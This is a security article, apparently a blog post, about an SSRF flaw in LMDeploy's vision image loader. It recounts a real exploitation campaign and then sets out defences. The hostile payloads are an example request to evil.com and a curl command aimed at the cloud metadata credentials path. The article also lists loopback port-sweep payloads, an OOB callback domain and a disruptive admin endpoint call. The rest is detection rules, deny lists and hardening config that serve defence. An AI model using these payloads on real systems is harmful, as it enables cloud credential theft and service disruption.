Introduction
LMDeploy, a popular LLM inference toolkit, contains a Server-Side Request Forgery (SSRF) vulnerability in its vision-language image loading path. Tracked as CVE-2026-33626 (CVSS 7.5), the flaw allows unauthenticated attackers to abuse the `load_image()` function to issue arbitrary HTTP requests from the server, enabling cloud credential theft, internal network scanning, and lateral movement. The weaponization window has collapsed from weeks to hours: Sysdig observed the first live exploitation just 12 hours and 31 minutes after the GitHub Security Advisory was published, with the attacker conducting a multi-stage internal reconnaissance campaign using only the advisory text as a blueprint.
Learning Objectives
- Understand the SSRF mechanism: Analyze the vulnerable `load_image()` code in LMDeploy and its exploitation chain.
- Master attacker TTPs: Reconstruct the three-phase attack sequence, including IMDS credential harvesting, internal port scanning, and OOB DNS exfiltration.
- Learn defense-in-depth: Apply best-practice mitigations, including network egress controls, metadata service hardening, and runtime detection.
You Should Know
1. Anatomy of the LMDeploy SSRF Vulnerability
The attack surface lies in LMDeploy’s vision-language module. The `load_image()` function in `lmdeploy/vl/utils.py` fetches a user-supplied URL without any validation of internal or private IP addresses, allowing any external actor to instruct the inference server to make arbitrary web requests. Below is the standard OpenAI-compatible request shape that triggers this behavior:
{
  "model": "internlm-xcomposer2",
  "messages": [{
    "role": "user",
    "content": [
      {"type": "text", "text": "Analyze this image"},
      {"type": "image_url", "image_url": {"url": "http://evil.com/exploit"}}
    ]
  }]
}
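To make the attacker-controlled field concrete, here is a minimal Python sketch that pulls every `image_url` value out of a request body of the shape shown above. The helper name `extract_image_urls` is hypothetical and is not part of LMDeploy; it only illustrates where untrusted URLs enter the request, which is the point any validation or logging layer would need to inspect.

```python
from typing import Any


def extract_image_urls(payload: dict[str, Any]) -> list[str]:
    """Collect every image_url value from an OpenAI-style chat payload."""
    urls: list[str] = []
    for message in payload.get("messages", []):
        if not isinstance(message, dict):
            continue
        content = message.get("content")
        # Plain-string content carries no image parts.
        if not isinstance(content, list):
            continue
        for part in content:
            if not isinstance(part, dict) or part.get("type") != "image_url":
                continue
            image_url = part.get("image_url")
            # The field may be an object with a "url" key or a bare string.
            if isinstance(image_url, dict):
                image_url = image_url.get("url")
            if isinstance(image_url, str):
                urls.append(image_url)
    return urls


request_body = {
    "model": "internlm-xcomposer2",
    "messages": [{
        "role": "user",
        "content": [
            {"type": "text", "text": "Analyze this image"},
            {"type": "image_url", "image_url": {"url": "http://evil.com/exploit"}},
        ],
    }],
}

print(extract_image_urls(request_body))
```

Every URL returned by such a helper is attacker input and should be treated as untrusted before the server fetches it.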
Step-by-step guide to testing for the vulnerability (ethical use only):
1. Identify an LMDeploy inference server endpoint (the examples here assume port 8000; LMDeploy's `api_server` listens on 23333 by default).
2. Send a POST request to `/v1/chat/completions` with a malicious `image_url` targeting an internal resource, e.g. `http://169.254.169.254/latest/meta-data/`.
3. If the server responds with the cloud metadata or an error confirming the request was processed, the server is vulnerable.
4. Use `curl` to automate the test:
curl -X POST http://target.com:8000/v1/chat/completions \
  -H "Content-Type: application/json" \
  -d '{
    "model": "internlm-xcomposer2",
    "messages": [{"role": "user", "content": [
      {"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}}
    ]}]
  }'
2. The Three-Phase Attack Campaign (Sysdig Honeypot Analysis)
Sysdig captured a real adversary conducting a systematic internal reconnaissance session lasting only eight minutes. The attack originated from IP `103.116.72[.]119` and followed a structured methodology:
Phase 1 – Cloud metadata and internal service probing (03:35:22 UTC):
The attacker first targeted the AWS Instance Metadata Service (IMDS) using the payload `http://169.254.169.254/latest/meta-data/iam/security-credentials/` in an attempt to steal IAM role credentials. They then pivoted to probe the loopback Redis port (`127.0.0.1:6379`) and MySQL port (`127.0.0.1:3306`) to identify in-cluster data stores.
Phase 2 – Out-of-band (OOB) callback and API enumeration (03:41:07 UTC):
To confirm that the SSRF primitive could reach arbitrary external hosts, the attacker used an OAST DNS callback to `http://cw2mhnbd.requestrepo.com`. Immediately after, they enumerated the API surface by requesting:
GET /
GET /openapi.json
POST /v1/chat/completions
The `/openapi.json` endpoint exposed internal administrative APIs, including those under `/distserve/`, which the adversary then probed.
Phase 3 – Administrative disruption and loopback port sweep (03:42:35 UTC):
The attacker sent a POST request to `/distserve/p2p_drop_connect` to tear down the ZMQ link between prefill and decode engines, degrading inference availability. Finally, they performed a scripted loopback port sweep:
{"image_url": "http://127.0.0.1:6379"}
{"image_url": "http://127.0.0.1:3306"}
{"image_url": "http://127.0.0.1:8080"}
This 36-second scan showed the attacker which internal services were reachable through the vulnerable inference engine.
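The targets seen across the three phases fall into a few recognizable classes. The following Python sketch triages a URL by its literal host using only the standard library; the function name `classify_target` and the category labels are illustrative assumptions, not Sysdig's tooling. It deliberately does not resolve DNS, so a hostname that points at an internal address is reported only as a hostname.

```python
import ipaddress
from urllib.parse import urlsplit

METADATA_IP = ipaddress.ip_address("169.254.169.254")


def classify_target(url: str) -> str:
    """Label an SSRF target URL by the kind of address it names."""
    try:
        host = urlsplit(url).hostname
    except ValueError:
        return "invalid"
    if not host:
        return "invalid"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: a DNS name such as an OOB callback domain.
        return "external-hostname"
    if addr == METADATA_IP:
        return "cloud-metadata"
    if addr.is_loopback:
        return "loopback"
    if addr.is_private or addr.is_link_local:
        return "internal"
    return "external-ip"


# Targets taken from the campaign described above.
observed = [
    "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
    "http://127.0.0.1:6379",
    "http://127.0.0.1:3306",
    "http://cw2mhnbd.requestrepo.com",
    "http://127.0.0.1:8080",
]

for url in observed:
    print(f"{classify_target(url):18} {url}")
```

A burst of `cloud-metadata` and `loopback` targets arriving through `image_url` within seconds is the pattern this campaign produced.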
3. Defensive Mitigations: Hardening Your AI Infrastructure
The collapse of the patch-to-exploit window to less than 13 hours demands immediate, layered defenses. Perform the following actions in order:
Step 1: Upgrade LMDeploy immediately
Update to version 0.12.3 or later. This patch introduces the `_is_safe_url()` function that blocks all internal IP ranges and link-local addresses. Quote the requirement so the shell does not treat `>` as an output redirection:
pip install --upgrade "lmdeploy>=0.12.3"
If an immediate upgrade is impossible, front the inference API with a reverse proxy that strips or rewrites the `image_url` field, or disable vision-model endpoints entirely.
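For teams that must filter requests in a proxy before they can upgrade, the check can be approximated as follows. This is a sketch of the general technique, not LMDeploy's actual `_is_safe_url()` implementation: the names `is_public_url`, `resolve_host`, and `fake_resolver` are hypothetical, and the policy (allow only `http`/`https` URLs whose every resolved address is globally routable) is an assumption about what a reasonable filter would enforce.

```python
import ipaddress
import socket
from typing import Callable, Iterable
from urllib.parse import urlsplit


def resolve_host(host: str) -> list[str]:
    """Resolve a hostname to its IP addresses using the system resolver."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return [info[4][0] for info in infos]


def is_public_url(
    url: str,
    resolver: Callable[[str], Iterable[str]] = resolve_host,
) -> bool:
    """Return True only if the URL is http(s) and resolves solely to public IPs."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return False
    if parts.scheme not in ("http", "https") or not host:
        return False
    try:
        addresses = list(resolver(host))
        # A single loopback, private, or link-local address rejects the URL.
        return bool(addresses) and all(
            ipaddress.ip_address(a).is_global for a in addresses
        )
    except (OSError, ValueError):
        # Unresolvable hosts and unparsable addresses are rejected.
        return False


# Hypothetical static resolver so the demo runs without DNS.
FAKE_DNS = {
    "images.example": ["93.184.216.34"],
    "rebind.example": ["93.184.216.34", "127.0.0.1"],
}


def fake_resolver(host: str) -> list[str]:
    return FAKE_DNS.get(host, [host])


for candidate in (
    "http://images.example/cat.png",
    "http://169.254.169.254/latest/meta-data/",
    "http://rebind.example/",
    "file:///etc/passwd",
):
    print(candidate, is_public_url(candidate, resolver=fake_resolver))
```

A check like this is only a partial defense. The fetch that follows must connect to the address that was validated and must not follow redirects blindly, otherwise DNS rebinding or a redirect to an internal address can bypass it.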
Step 2: Enforce IMDSv2 on all inference nodes
An SSRF primitive using only `requests.get()` cannot generate the required PUT session token for IMDSv2, effectively blocking this attack vector. For AWS, set:
aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required --http-put-response-hop-limit 1
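The reason IMDSv2 stops a GET-only SSRF primitive is visible in the shape of the requests. The Python sketch below builds, without sending, the two requests a legitimate IMDSv2 client makes and the single request an `image_url` fetch can produce. The helper names are hypothetical; the token endpoint and header names are the ones AWS documents for IMDSv2.

```python
import urllib.request

IMDS_BASE = "http://169.254.169.254"


def build_token_request(ttl_seconds: int = 21600) -> urllib.request.Request:
    """Step 1 of IMDSv2: a PUT that asks for a session token."""
    return urllib.request.Request(
        f"{IMDS_BASE}/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def build_metadata_request(path: str, token: str) -> urllib.request.Request:
    """Step 2 of IMDSv2: a GET that presents the session token."""
    return urllib.request.Request(
        f"{IMDS_BASE}/latest/meta-data/{path.lstrip('/')}",
        headers={"X-aws-ec2-metadata-token": token},
    )


def build_ssrf_style_request(path: str) -> urllib.request.Request:
    """What a URL-only fetch yields: a plain GET with no token header."""
    return urllib.request.Request(
        f"{IMDS_BASE}/latest/meta-data/{path.lstrip('/')}"
    )


token_req = build_token_request()
ssrf_req = build_ssrf_style_request("iam/security-credentials/")

print(token_req.get_method(), token_req.full_url)
print(ssrf_req.get_method(), ssrf_req.full_url)
print("token header present:", ssrf_req.has_header("X-aws-ec2-metadata-token"))
```

With `--http-tokens required`, the metadata service answers the tokenless GET with an HTTP 401, because the attacker controls only the URL and can neither issue the PUT nor set the token header.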
Step 3: Restrict network egress at the VPC/security group level
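Inference nodes should only be allowed to reach model-artifact storage (e.g., S3, GCS) and essential logging endpoints. Block all traffic to RFC 1918, link-local, and loopback addresses. Note that AWS security groups support only allow rules, so express the policy as a narrow outbound allow-list and place explicit denies in a network ACL or host firewall. Security groups and network ACLs also do not filter traffic to the instance metadata service, and loopback traffic never leaves the host, so those two ranges must be handled on the host itself (for example with iptables) in addition to IMDSv2. The intended deny set is:
Outbound: Deny all to 169.254.0.0/16, 127.0.0.0/8, 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16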
Step 4: Implement runtime detection with Falco rules
Use Falco to monitor outbound connections from inference processes. Sysdig recommends enabling rules that fire on connections to cloud metadata services, regardless of the framework. Example Falco rule snippet:
- rule: Contact EC2 Instance Metadata Service From Container
  desc: Detect a container opening an outbound connection to the EC2 instance metadata service
  condition: outbound and fd.sip="169.254.169.254" and container
  output: "SSRF attempt: container %container.id contacts IMDS"
  priority: CRITICAL
Step 5: Rotate credentials and audit internal services
Any IAM role credentials attached to pre-v0.12.3 LMDeploy deployments must be considered compromised and rotated immediately. Additionally, ensure that Redis, MySQL, and administrative interfaces are bound only to private interfaces and require strong authentication.
4. Windows and Linux Commands for Forensic Investigation
If you suspect an LMDeploy server has been exploited, use the following commands to sweep for indicators:
Linux – Check for unexpected connections to IMDS or loopback:
# Check live connections to IMDS
sudo ss -tnp | grep -F 169.254.169.254
# Search for image_url patterns in API access logs
grep -rE "image_url.*169\.254" /var/log/lmdeploy/
# Search service logs for known OOB callback domains
journalctl -u lmdeploy | grep -i "requestrepo"
Windows – Use PowerShell to check for indicators:
# Check for connections to internal IP ranges
Get-NetTCPConnection | Where-Object { $_.RemoteAddress -match '^(127\.|10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.)' }
# Search IIS logs for SSRF payloads
Select-String -Path "C:\inetpub\logs\LogFiles\*\*.log" -Pattern "image_url.*http://169\.254\.169\.254"
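The same sweep can be done portably in Python when logs are collected centrally. The sketch below flags log lines in which an `image_url` points at a non-public address or at a known OOB callback domain. It assumes that request bodies appear in the log as JSON-like text, which depends on your logging configuration; the names `scan_lines` and `OOB_DOMAINS` are hypothetical, and the domain list contains only the indicator mentioned in this article.

```python
import ipaddress
import re
from typing import Iterable, Optional
from urllib.parse import urlsplit

# Capture the first URL that follows each "image_url" mention on a line.
URL_AFTER_IMAGE_URL = re.compile(r"image_url.*?(https?://[^\s\"'<>}]+)")
OOB_DOMAINS = ("requestrepo.com",)  # extend with your own indicators


def suspicious_reason(url: str) -> Optional[str]:
    """Return why a URL looks like an SSRF target, or None if it does not."""
    try:
        host = urlsplit(url).hostname or ""
    except ValueError:
        return "malformed-url"
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        if host == "localhost":
            return "internal-address"
        if any(host == d or host.endswith("." + d) for d in OOB_DOMAINS):
            return "oob-callback"
        return None
    return None if addr.is_global else "internal-address"


def scan_lines(lines: Iterable[str]) -> list[tuple[int, str, str]]:
    """Return (line number, reason, url) for every suspicious image_url."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        for match in URL_AFTER_IMAGE_URL.finditer(line):
            url = match.group(1)
            reason = suspicious_reason(url)
            if reason:
                findings.append((lineno, reason, url))
    return findings


sample_log = [
    '{"type": "image_url", "image_url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}}',
    '{"image_url": "http://cw2mhnbd.requestrepo.com"}',
    '{"image_url": "https://example.com/cat.png"}',
]

for finding in scan_lines(sample_log):
    print(finding)
```

To scan a real file, pass an open file handle to `scan_lines`, since it accepts any iterable of lines.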
5. Proactive Security: Hardening Kubernetes Deployments
Given that LMDeploy is often deployed in Kubernetes clusters, implement network policies to enforce egress restrictions. Below is an example `NetworkPolicy` that prevents pods from accessing metadata services and internal ranges:
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: lmdeploy-egress-hardening
spec:
  podSelector:
    matchLabels:
      app: lmdeploy
  policyTypes:
    - Egress
  egress:
    - to:
        - ipBlock:
            cidr: 0.0.0.0/0
            except:
              - 169.254.0.0/16
              - 127.0.0.0/8
              - 10.0.0.0/8
              - 172.16.0.0/12
              - 192.168.0.0/16
      ports:
        - port: 443
          protocol: TCP
        - port: 80
          protocol: TCP
What Undercode Says
- Key Takeaway 1: The LLM inference supply chain is now a prime target for adversaries; the exploit gap has collapsed from weeks to less than 13 hours.
- Key Takeaway 2: Traditional patch management cycles are obsolete for AI infrastructure; defense-in-depth (IMDSv2 + egress filtering + runtime detection) is the only viable strategy.
- Analysis: CVE-2026-33626 illustrates a shift: threat actors can now build exploits directly from security advisories using generative AI, without waiting for public PoC code. That Sysdig observed exploitation within 12 hours and 31 minutes, even though LMDeploy has only ~7,800 GitHub stars, shows that niche ML tooling is not safe from rapid, automated attacks.
Generative AI accelerates this collapse: advisories that include the affected file, parameter name, and missing sanitization become input prompts for attack generation. Defenders should assume that every inference server, agent framework, or vision API that fetches URLs is vulnerable by default unless explicitly hardened. The balance of speed, automation, and reachability has shifted to the attacker’s advantage.
Prediction
The exploitation of CVE-2026-33626 is not an isolated incident but the beginning of a broader trend: hyper-fast weaponization of AI infrastructure disclosures. In the coming 12 months, expect an order-of-magnitude increase in automated exploit generation from security advisories, driven by LLMs and agentic workflows.
We predict the emergence of “advisory-first exploit frameworks”: autonomous systems that monitor GHSA and NVD feeds, extract vulnerable code patterns, and generate working exploits in minutes. The AI infrastructure threat landscape will bifurcate: organizations that implement proactive egress control and metadata service hardening will survive; those relying solely on patch management will face repeated, automated breaches. The clock on AI security has fundamentally reset, and defenders are already behind.
Reported By: Igor Stepansky – Hackers Feeds


